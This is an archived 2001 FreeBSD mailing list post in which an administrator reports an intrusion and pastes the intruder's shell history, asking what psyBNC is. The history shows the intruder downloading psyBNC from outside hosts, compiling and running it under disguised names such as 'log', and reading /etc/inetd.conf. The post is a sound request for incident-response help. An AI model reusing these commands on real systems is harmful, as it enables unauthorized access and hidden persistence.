Date: Thu, 9 Aug 2001 11:59:27 +1000 (EST) From: =?iso-8859-1?q?Keith=20Spencer?= <bsd2000au@yahoo.com.au> To: fbsd <freebsd-questions@freebsd.org> Subject: Yep-I been hacked! Whats psyBNC? Someone installed it Message-ID: <20010809015927.36963.qmail@web12007.mail.yahoo.com>
next in thread | raw e-mail | index | archive | help
Hi all, I am on the trail here. I know zero about security (almost) But I found in a user dir all this stuff and lloking in the .bash_history for the user I find the stuff below. I am no genius but I figure I can see some seriously nasty stuff here! Can someone help me make sense of it? Thanks Keith +++ 8< SNIP--------------------------- exit w ls fetch http://www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz fetch http://www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz fetch www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz lynx www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz lynx http://www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz lynx 64.65.0.134/psyBNC2.2.1.tar.gz ftp ftp.geocities.com ftp 209.1.225.146 tar zxvf psybnc* rm -f psybnc.tgz mv psybnc logs cd logs make ./psybnc ls make FreeBSD make bsd make menuconfig make cat psybnc.conf mv psybnc.conf log.conf mv psybnc log ./log ls mv log psybnc ./psybnc cd psybnc ls ./psybnc pwd cp psybnc /usr/home/bsd/logs/psybnc cp psybnc /usr/home/bsd/logs/ cd .. mv psybnc dir cd dir cp psybnc /usr/home/bsd/logs/ cd .. ./psybnc ./psybnc log.conf kill -9 24639 rm -rf dir mv psybnc log ./log ./log log.conf ps x exit w telnet 127.0.0.1 cat /etc/inetd.conf exit _____________________________________________________________________________ http://shopping.yahoo.com.au - Father's Day Shopping - Find the perfect gift for your Dad for Father's Day To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010809015927.36963.qmail>